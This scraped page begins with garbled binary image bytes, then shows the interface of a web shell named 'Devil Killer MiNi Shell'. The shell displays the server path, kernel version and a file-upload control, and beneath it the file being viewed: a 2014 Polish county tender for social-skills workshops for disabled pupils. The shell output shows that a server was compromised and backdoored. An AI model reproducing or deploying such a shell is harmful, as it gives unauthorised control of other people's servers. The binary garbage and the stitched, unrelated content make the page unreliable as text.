JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140612/126783-N-2014.html

<p class="kh_header"><b>Mikołów: Zorganizowanie i przeprowadzenie wyjazdowych warsztatów umiejętności społecznych Ja w społeczeństwie przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 126783 - 2014; data zamieszczenia: 12.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie wyjazdowych warsztatów umiejętności społecznych Ja w społeczeństwie przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem i zakresem zamówienia jest usługa: w zakresie zorganizowania i przeprowadzenia wyjazdowych warsztatów umiejętności społecznych Ja w społeczeństwie przewidzianych w ramach projektu pn.:Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
 
Do zadań Wykonawcy należy zorganizowanie dwóch 5-dniowych warsztatów wyjazdowych.
I.Wyjazd pierwszy.
1.1 Wyjazd 5 -dniowy dla dwóch grup 7 osobowych z opiekunem dla każdej grupy (ogółem 14 osób + 2 opiekunów na jednym wyjeździe) oraz 3 trenerów. 
1.1.1 Pierwszy wyjazd ma zostać zorganizowany do miejscowości położonej w Beskidzie Śląskim. Uczestniczyć w nim będzie ogółem 14 osób i dwóch opiekunów. Trenerzy prowadzić będą zajęcia w wymiarze po 30 godzin dla każdej 7 osobowej grupy (razem 60 godzin zajęć warsztatowych na 1 wyjeździe dla 2 grup). Zajęcia odbywać się będą w dwóch 3- godzinnych blokach z trzema 10-minutowymi przerwami przez 5 dni. Z uwagi na udział w zajęciach dzieci niepełnosprawnych umysłowo i ruchowo oraz dzieci ze sprzężeniami dopuszczalne jest wydłużanie lub zwiększanie przerw w zależności od wydolności psychofizycznej uczestników. Zajęcia powinny odbywać się w godzinach 9.00 - 12.30 i 15.00-18.30. Konieczna będzie jednogodzinna przerwa poobiednia. Wykonawca zobowiązany jest do opracowania harmonogramu warsztatu, który ma zawierać w szczególności: plan każdego dnia z uwzględnieniem godzin podróży, posiłków i zajęć programowych opisanych w punkcie 1.3.
1.1.2 Wykonawca zapewnia transport z miejsca zamieszkania uczestników do miejsca realizacji warsztatów oraz odwóz uczestników z warsztatów do domów busem lub autokarem przystosowanym dla osób niepełnosprawnych i przeznaczonym dla ilości minimalnej 20 osób. Bus musi być wyposażony w windę lub platformę dla osoby na wózku inwalidzkim oraz musi być dostosowany do przewozu 1 osoby na wózku inwalidzkim. Autokar lub bus musi przewieźć dzieci z miejsc ich zamieszkania do miejsca warsztatów oraz z miejsca warsztatów do domów. Przywóz oraz odwóz uczestników nastąpi z i do gmin z terenu powiatu mikołowskiego. Maksymalna szacunkowa ilość kilometrów dla całej kompleksowej usługi transportowej wynosi 1000 km. Zamawiający nie będzie wykorzystywał autobusu w miejscu zakwaterowania. Przewoźnik powinien posiadać wszelkie zezwolenia i licencje, pojazd powinien być wyposażony w klimatyzację oraz posiadać odpowiednią ilość miejsca na bagaże oraz wózek inwalidzki.
1.1.3 Zakwaterowanie, stołówka oraz zajęcia warsztatowe muszą odbywać się na terenie jednego ośrodka. Pokoje 2-3 osobowe dla 14 uczestników, wyposażone w czajniki bezprzewodowe i TV oraz ręczniki, z pełnym węzłem sanitarnym w skład którego wchodzi toaleta, umywalka, prysznic. Zakłada się 7 pokoi 2 osobowych z możliwością przekształcenia 2 pokoi w pokoje 3 osobowe, z uwagi na konieczność dostosowania pokoi do płci uczestników. Oddzielne zakwaterowanie dla opiekunów grupy i trenerów w pokojach jednoosobowych z pełnym węzłem sanitarnym (toaleta, umywalka, prysznic). Sanitariaty dostosowane do osób niepełnosprawnych ruchowo przynajmniej w dwóch pokojach dwuosobowych: wymagane uchwyty przy toalecie oraz uchwyty i siedzisko lub krzesło pod prysznicem. W łazienkach winna być ciepła, bieżąca woda, a w pokojach tapczany jednoosobowe, szafy, stolik, krzesła i pościel.
1.1.4 Uczestnicy wyjazdu (dzieci, opiekunowie, trener) mają mieć zapewnione całodzienne wyżywienie składające się z trzech posiłków: śniadanie - w formie bufetu, dwudaniowy obiad - zupa oraz drugie danie, w tym 3 posiłki mięsne, jeden rybny i jeden jarski, co najmniej 2 sałatki lub surówki do każdego obiadu, napój oraz kolacji w formie bufetu z co najmniej jednym daniem gorącym, a także dodatkowy posiłek - deser w formie galaretki, musu, ciasta, owoców. Wymagany jest stały dostęp do napojów gorących - kawa, herbata i zimnych np. woda, kompot, soki. Posiłki powinny być wydawane w  przedziałach czasowych: śniadanie: 8.00 - 9.00; obiad+podwieczorek: 13.00 - 14.00, kolacja: 18.30 -19.30. Menu musi uwzględniać diety uczestników wynikające ze wskazań zdrowotnych, w tym dietę bezglutenową dla 2 osób oraz dietę lekkostrawną dla 5 osób w razie potrzeby. 
1.1.5 Obiekt musi posiadać sale konferencyjną (wykładową) przeznaczoną dla co najmniej 15 osób, wyposażoną w sprzęt audiowizualny, rzutnik, dostęp do Internetu. Ponadto musi posiadać druga salę mieszczącą minimum 10 osób do zajęć w grupie. Ośrodek, w którym są organizowane warsztaty powinien być suchy, ogrzewany przez system centralnego ogrzewania, mieć wyjścia ewakuacyjne (przeglądy), być dostosowany do obsługi grup szkolnych. Ponadto obiekt musi być przystosowany dla osób niepełnosprawnych, w tym na wózkach inwalidzkich. 
1.1.6.Wykonawca zobowiązuje się do wykupienia ubezpieczenia od następstw nieszczęśliwych wypadków dla wszystkich uczestników i opiekunów warsztatów (16 osób) podczas podróży i pobytu w ośrodku, kosztów leczenia na kwotę 15.000,00 zł. przypadającą na 1 osobę. Zamawiający zastrzega, że obowiązkiem wykonawcy jest przekazanie Zamawiającemu kopii dokumentu potwierdzającego wykupienie ubezpieczenia do 5 dni od daty planowanego wyjazdu. 
1.1.7 Wykonawca zobowiązany jest do opłacenia taksy klimatycznej za wszystkich uczestników warsztatów, jeśli wymagać będzie tego lokalizacja ośrodka w miejscowości uzdrowiskowej.
1.1.8 W razie konieczności Wykonawca musi zapewnić opiekę medyczną uczestnikom wyjazdu w ramach ubezpieczenia zdrowotnego, polegającą na wezwaniu lekarza do obiektu lub niezwłocznym dowiezieniu uczestnika wyjazdu do punktu opieki medycznej (przychodni lub szpitala) bezpłatnym transportem. Wykonawca zapewnia zaopatrzenie w podstawowe leki i środki opatrunkowe. 

1.1.9 Rekrutację na warsztaty umiejętności społecznych przeprowadzi Zamawiający. 
1.1.10 Wykonawca jest zobowiązany przedstawić Zamawiającemu zaświadczenie o zgłoszeniu wypoczynku wystawione przez właściwego ze względu na miejsce siedziby lub zamieszkania organizatora wypoczynku Kuratora oświaty, najpóźniej na 3 dni przed rozpoczęciem turnusu pobytowego. Nie spełnienie w/w warunku będzie stanowić podstawę do rozwiązania umowy z Wykonawcą.
1.1.11 Z przeprowadzonych warsztatów należy wykonać dokumentację fotograficzną. 
1.1.12 Czas realizacji warsztatów: lipiec lub sierpień 2014 roku.  
II.Wyjazd drugi.
1.2 Wyjazd 5 -dniowy dla dwóch grup 7 osobowych z opiekunem dla każdej grupy (ogółem 14 osób + 2 opiekunów na jednym wyjeździe) oraz 3 trenerów. 
1.2.1 Drugi wyjazd ma zostać zorganizowany do miejscowości położonej w Beskidzie Śląskim. Uczestniczyć w nim będzie ogółem 14 osób i dwóch opiekunów. Trenerzy prowadzić będą zajęcia w wymiarze po 30 godzin dla każdej 7 osobowej grupy (razem 60 godzin zajęć warsztatowych na 1 wyjeździe dla 2 grup). Zajęcia odbywać się będą w dwóch 3- godzinnych blokach z trzema 10-minutowymi przerwami przez 5 dni. Z uwagi na udział w zajęciach dzieci niepełnosprawnych umysłowo i ruchowo oraz dzieci ze sprzężeniami dopuszczalne jest wydłużanie lub zwiększanie przerw w zależności od wydolności psychofizycznej uczestników. Zajęcia powinny odbywać się w godzinach 9.00 - 12.30 i 15.00-18.30. Konieczna będzie jednogodzinna przerwa poobiednia. Wykonawca zobowiązany jest do opracowania harmonogramu warsztatu, który ma zawierać w szczególności: plan każdego dnia z uwzględnieniem godzin podróży, posiłków i zajęć programowych opisanych w punkcie 1.3.
1.2.2 Wykonawca zapewnia transport z miejsca zamieszkania uczestników do miejsca realizacji warsztatów oraz odwóz uczestników z warsztatów do domów busem lub autokarem przystosowanym dla osób niepełnosprawnych i przeznaczonym dla ilości minimalnej 20 osób. Bus musi być wyposażony w windę lub platformę dla osoby na wózku inwalidzkim oraz musi być dostosowany do przewozu 1 osoby na wózku inwalidzkim. Autokar lub bus musi przewieźć dzieci z miejsc ich zamieszkania do miejsca warsztatów oraz z miejsca warsztatów do domów. Przywóz oraz odwóz uczestników nastąpi z gmin z terenu powiatu mikołowskiego. Maksymalna szacunkowa ilość kilometrów dla całej kompleksowej usługi transportowej wynosi 1000 km. Zamawiający nie będzie wykorzystywał autobusu w miejscu zakwaterowania. Przewoźnik powinien posiadać wszelkie zezwolenia i licencje, pojazd powinien być wyposażony w klimatyzację oraz posiadać odpowiednią ilość miejsca na bagaże oraz wózek inwalidzki.
1.2.3 Zakwaterowanie, stołówka oraz zajęcia warsztatowe muszą odbywać się na terenie jednego ośrodka. Pokoje 2-3 osobowe dla 14 uczestników, wyposażone w czajniki bezprzewodowe i TV oraz ręczniki, z pełnym węzłem sanitarnym w skład którego wchodzi toaleta, umywalka, prysznic. Zakłada się 7 pokoi 2 osobowych z możliwością przekształcenia 2 pokoi w pokoje 3 osobowe, z uwagi na konieczność dostosowania pokoi do płci uczestników. Oddzielne zakwaterowanie dla opiekunów grupy i trenerów w pokojach jednoosobowych z pełnym węzłem sanitarnym (toaleta, umywalka, prysznic). Sanitariaty dostosowane do osób niepełnosprawnych ruchowo przynajmniej w dwóch pokojach dwuosobowych: wymagane uchwyty przy toalecie oraz uchwyty i siedzisko lub krzesło pod prysznicem. W łazienkach winna być ciepła, bieżąca woda, a w pokojach tapczany jednoosobowe, szafy, stolik, krzesła i pościel.
1.2.4 Uczestnicy wyjazdu (dzieci, opiekunowie, trener) mają mieć zapewnione całodzienne wyżywienie składające się z trzech posiłków: śniadanie - w formie bufetu, dwudaniowy obiad - zupa oraz drugie danie, w tym 3 posiłki mięsne, jeden rybny i jeden jarski, co najmniej 2 sałatki lub surówki do każdego obiadu, napój oraz kolacji w formie bufetu z co najmniej jednym daniem gorącym, a także dodatkowy posiłek - deser w formie galaretki, musu, ciasta, owoców. Wymagany jest stały dostęp do napojów gorących - kawa, herbata i zimnych np. woda, kompot, soki. Posiłki powinny być wydawane w  przedziałach czasowych: śniadanie: 8.00 - 9.00; obiad+podwieczorek: 13.00 - 14.00, kolacja: 18.30 -19.30. Menu musi uwzględniać diety uczestników wynikające ze wskazań zdrowotnych, w tym dietę bezglutenową dla 2 osób oraz dietę lekkostrawną dla 5 osób w razie potrzeby. 
1.2.4 Obiekt musi posiadać sale konferencyjną (wykładową) przeznaczoną dla co najmniej 15 osób, wyposażona w sprzęt audiowizualny, rzutnik, dostęp do Internetu. Ponadto musi posiadać druga salę mieszczącą minimum 10 osób do zajęć w grupie. Ośrodek, w którym są organizowane warsztaty powinien być suchy, ogrzewany przez system centralnego ogrzewania, mieć wyjścia ewakuacyjne (przeglądy), być dostosowany do obsługi grup szkolnych. Ponadto obiekt musi być przystosowany dla osób niepełnosprawnych, w tym na wózkach inwalidzkich.
1.2.6 Wykonawca zobowiązuje się do wykupienia ubezpieczenia od następstw nieszczęśliwych wypadków dla wszystkich uczestników i opiekunów warsztatów (16 osób) podczas podróży i pobytu w ośrodku, kosztów leczenia na kwotę 15.000,00 zł. przypadającą na 1 osobę. Zamawiający zastrzega, że obowiązkiem wykonawcy jest przekazanie Zamawiającemu kopii dokumentu potwierdzającego wykupienie ubezpieczenia do 5 dni od daty planowanego wyjazdu. 
1.2.7 Wykonawca zobowiązany jest do opłacenia taksy klimatycznej za wszystkich uczestników warsztatów, jeśli wymagać będzie tego lokalizacja ośrodka w miejscowości uzdrowiskowej.
1.2.8 W razie konieczności Wykonawca musi zapewnić opiekę medyczną uczestnikom wyjazdu w ramach ubezpieczenia zdrowotnego, polegającą na wezwaniu lekarza do obiektu lub niezwłocznym dowiezieniu uczestnika wyjazdu do punktu opieki medycznej (przychodni lub szpitala) bezpłatnym transportem. Wykonawca zapewnia zaopatrzenie w podstawowe leki i środki opatrunkowe. 
1.2.9 Rekrutację na warsztaty umiejętności społecznych przeprowadzi Zamawiający. 
1.2.10 Wykonawca jest zobowiązany przedstawić Zamawiającemu zaświadczenie o zgłoszeniu wypoczynku wystawione przez właściwego ze względu na miejsce siedziby lub zamieszkania organizatora wypoczynku Kuratora oświaty, najpóźniej na 3 dni przed rozpoczęciem turnusu pobytowego. Nie spełnienie w/w warunku będzie stanowić podstawę do rozwiązania umowy z Wykonawcą.
1.2.11 Z przeprowadzonych warsztatów należy wykonać dokumentację fotograficzną. 
1.2.12 Czas realizacji warsztatów: sierpień 2014 roku.  

1.3 Opis zajęć programowych: 
Każda grupa 7 osobowa musi mieć 30 godzin zajęć po 6 godzin dziennie w blokach 3 godzinnych z jednogodzinną przerwą obiadową i trzema 10 minutowymi przerwami w blokach. Wyjazd ma uwzględniać jedną wycieczkę pieszą, 2-3 godzinną mająca na celu trening poznanych umiejętności polegający np. na przygotowaniu imprezy, samodzielnym załatwianiu spraw w urzędzie, samodzielnym ustalaniu trasy i zakupie biletów, spotkaniu z pracodawcą i autoprezentacji, wyjściu na lody, do kina itp.. 
Program warsztatów umiejętności społecznych obejmować powinien problematykę pracy oraz dojrzałego funkcjonowania osobistego i społecznego w różnych relacjach 
i okolicznościach.
Zakłada się, że są to najważniejsze obszary spełniania się osoby dorosłej, niezależnie od stopnia sprawności ruchowej i poznawczej. I chociaż z różnych przyczyn pewne role społeczne mogą być nie podejmowane, nie oznacza to jednak braku przeżyć, czy pragnień z nimi związanych. Będą wtedy realizowane w marzeniach i fantazjach.
Omawianie tych tematów musi być więc osadzone w problematyce rozwojowej i oprócz znaczenia praktycznego ma dla osób ze sprzężoną niepełnosprawnością znaczenie terapeutyczne.
Cele edukacyjne warsztatów:
1. Edukacja na temat pracy. Dostarczenie uczniom wiedzy i pojęć związanych z pracą 
i kształtowaniem odpowiednich postaw (informacje gdzie i w jaki sposób szukać pracy, pisanie CV, rozmowa kwalifikacyjna, autoprezentacja, BHP w pracy, , prawa i obowiązki w pracy, stosunek do przełożonego i współpracowników itd.)
2. Ćwiczenie umiejętności psychospołecznych przydatnych w pracy i w życiu (radzenie sobie z trudnościami w pracy, zwracanie się o pomoc, ćwiczenia zachowań asertywnych i umiejętności prowadzenia negocjacji, kultura osobista w kontaktach interpersonalnych, umiejętność przyjmowania krytyki itd.)
3. Pobudzanie aktywności życiowej, przy zachowaniu wsparcia ze strony terapeutów (trenerów) i zadbaniu o poczucie bezpieczeństwa uczestników (rola asystenta w życiu osoby niepełnosprawnej - czego możesz oczekiwać; kształtowanie umiejętności rozpoznawania swoich mocnych i słabych stron oraz wykorzystywania tej wiedzy w podejmowaniu aktywności zawodowej i społecznej)
Proponowane tematy:
1. Omówienie obaw i niepokojów związanych z ukończeniem kształcenia w szkole specjalnej lub przejściem na najwyższy IV etap edukacyjny - formułowanie realnych oczekiwań wobec środowiska i siebie samego. Wskazanie pozytywnych i atrakcyjnych celów w życiu. Dostrzeganie pozytywnych cech u innych i wyrażanie ich. Kształtowanie umiejętności pozytywnego myślenia o sobie i o świecie. Wzmacnianie poczucia własnej wartości.
2. Praca idealna i praca realna - jaką pracę chciałbym wykonywać, a jakiej mogę się podjąć (określanie mocnych i słabych stron). Poznanie różnych rodzajów pracy, kształcenie umiejętności oceny danej pracy z uwzględnieniem własnych umiejętności i predyspozycji. Urealnianie oczekiwań wobec przyszłego miejsca zatrudnienia. Konstruowanie wywiadu który zostanie przeprowadzony z pracującą osobą niepełnosprawną
3. Spotkanie z osobą niepełnosprawną, która pracuje aktywnie - przeprowadzenie wywiadu, rozmowa kierowana dotycząca sposobów poszukiwania pracy, problemów pojawiających się w pracy, stosunków z przełożonymi i współpracownikami, możliwości uzyskania pomocy, obowiązków i praw pracownika, satysfakcji z pracy (na konkretnym przykładzie) 
4. Jak i gdzie szukać pracy? - poznanie różnorodnych możliwości szukania pracy oraz instytucji pomagających w poszukiwaniu pracy osobom niepełnosprawnym. Kształtowanie umiejętności pisania CV, aplikacji, gromadzenia dokumentów potrzebnych do zatrudnienia
5. Szukam pomocy - gdzie i jak? Rozwijanie umiejętności zwracania się o pomoc do odpowiednich instytucji, pisania podań do MOPS i innych urzędów. Rola i zadania PCPR, czego oczekiwać po wizycie w Urzędzie Pracy, jakiej pomocy udzielają Urzędy Pracy (działalność Klubu Pracy), uprawnienia pracownicze osób niepełnosprawnych, formy wsparcia oferowane przez PUP dla osób niepełnosprawnych 
6. Jak zdobyć pracę? Ćwiczenie umiejętności przeprowadzania rozmowy kwalifikacyjnej, autoprezentacji, składania propozycji, rozwijanie umiejętności zadawania pytań dotyczących zakresu obowiązków i formułowania oczekiwań wobec pracodawcy, kształtowanie umiejętności wykazywania własnej inicjatywy w działaniu
7. Prawa i obowiązki w pracy. Dyscyplina pracy, pojęcie obowiązku - poznanie jakie obowiązki musi wypełnić pracodawca w zakresie przestrzegania przepisów bezpieczeństwa i higieny pracy, jakie prawa i obowiązki ma pracownik w zakresie bezpieczeństwa i higieny pracy, na czym polega odpowiedzialność za naruszenie przepisów bezpieczeństwa i higieny pracy. Ćwiczenie przestrzegania dyscypliny pracy w zespole, poszanowanie godności osobistej osób współpracujących oraz zwracanie uwagi na kulturalne zachowanie podczas zajęć. Poznanie co znaczy termin obowiązki i z czego one wynikają: analizowanie różnych obowiązków i przewidywanie konsekwencji ich wypełniania i niewypełniania; poznanie przykładów obowiązków, jakie wynikają z pełnienia określonych ról społecznych; określanie, na czym polega odpowiedzialność i co to znaczy być za coś odpowiedzialnym.
8. Pieniądze, utrzymanie. Codzienne wydatki na życie. Renta i jej wartość - rozwijanie umiejętności planowania budżetu domowego, w tym zapoznanie z zasadami konstruowania prostego budżetu, kształtowanie umiejętności tworzenia i bilansowania budżetu, przekonanie uczestników, że budżet jest niezbędnym narzędziem, umożliwiającym bezpieczne funkcjonowanie. Kształtowanie umiejętności odczytywania wskaźników liczników znajdujących się w instalacjach domowych, zapoznanie z zasadami ekonomicznego gospodarowania energią elektryczną, gazem i wodą. Poznanie i rozwijanie umiejętności interpretacji etykiet znajdujących się na wyrobach AGD a dotyczących ekonomiki ich używania oraz ekologii. Utrwalanie zasad BHP przy korzystaniu z instalacji domowych.
9. Asystent i jego rola. Czy chciałbym mieć asystenta. Przyjmowanie asystenta do pracy. Zapoznanie z zakresem pomocy jakiej osobie niepełnosprawnej może udzielić asystent - doradztwo w zakresie usług medycznych, rehabilitacyjnych, zawodowego przekwalifikowania, kontaktów społecznych, usług kulturalnych, rekreacji i integracji ze środowiskiem, dążenie do usuwania wszelkiego typu barier psychologicznych, społecznych, architektonicznych, komunikacyjnych, pobudza nie do aktywność osoby niepełnosprawnej oraz jej rodziny w celu zaspokojenia potrzeb biologicznych, psychicznych i społecznych, włączanie osoby  niepełnosprawnej w programy instytucji i placówek świadczących usługi rehabilitacyjne. Ustalanie czy uczestnikom jest potrzebny asystent i w jakim zakresie mógłby pomóc danemu uczestnikowi. Nauka zadawania pytań kandydatowi na asystenta dotyczących jego kompetencji społecznych i osobistych. 
10. Umiejętności komunikacyjne i społeczne - wdrażanie reguł funkcjonowania społecznego oraz ćwiczenie sposobów adekwatnego zachowania się w różnych sytuacjach. Budowanie pozytywnych związków pomiędzy uczestnikami grupy a otoczeniem. Możliwość przebywania w bezpiecznych warunkach w niezagrażającej i akceptującej grupie rówieśniczej, co sprzyja integracji i kształtowaniu naturalnych relacji interpersonalnych. Gry i zabawy ruchowe sprzyjające pokonywaniu dystansu fizycznego. Ćwiczenia w komunikacji - wspólne podejmowanie decyzji. Określanie własnych stanów emocjonalnych i ich przyczyn. Wzmacnianie poczucia pewności siebie poprzez rozwijanie umiejętności swobodnej ekspresji ciała i siebie (swoich myśli, potrzeb). Rozwijanie świadomości swoich mocnych i słabszych stron. Rozwijanie świadomości różnic i podobieństw między osobami. Ekspresja siebie poprzez swobodną aktywność 
i zabawy ruchowe. Nauka rozpoznawania znaczenia gestów, ekspresji mimicznej i ciała. Nauka wykorzystywania komunikatów niewerbalnych (posługiwanie się gestem, mimiką, dystansem). Rozwijanie wyobraźni i kreatywności.
11. Rozwiązywanie problemów pojawiających się w kontaktach interpersonalnych - konstruktywne radzenie sobie z problemami. Dostarczenie wiedzy i doskonalenie umiejętności z zakresu konstruktywnego rozwiązywania konfliktów i problemów, podejmowania właściwych decyzji. Doskonalenie umiejętności rozpoznawania i nazywania emocji towarzyszących konfliktom międzyludzkim. Rozwijanie umiejętności radzenia sobie w różnych sytuacjach konfliktowych. Doskonalenie umiejętności samooceny własnych postaw i zachowań. Poznanie i przećwiczenie etapów rozwiązywania problemów:  zdefiniowanie problemu, rozważenie różnych sposobów jego rozwiązania, branie pod uwagę pozytywów i negatywów każdego z możliwych rozwiązań,  wybór najlepszego rozwiązania i zaplanowanie działań dla jego realizacji.

12. Świadomość emocjonalna i panowanie nad emocjami.  Rozpoznawanie uczuć i tworzenie słownika do ich wyrażania. Rozwijanie umiejętności dostrzegania powiązań między uczuciami, myślami i reakcjami. Ćwiczenia komunikowania przez kontakt wzrokowy, wyraz twarzy, ton głosu, gesty. Kształtowanie umiejętności rozpoznawania różnicy między uczuciami a działaniami. Kształtowanie umiejętności panowania nad impulsami. Rozwijanie umiejętności prowadzenia rozmowy z samym sobą, prowadzenie dialogu wewnętrznego. Doskonalenie umiejętności jasnego stawiania pytań i wytyczania celów. Ćwiczenie umiejętności uważnego słuchania innych osób. 
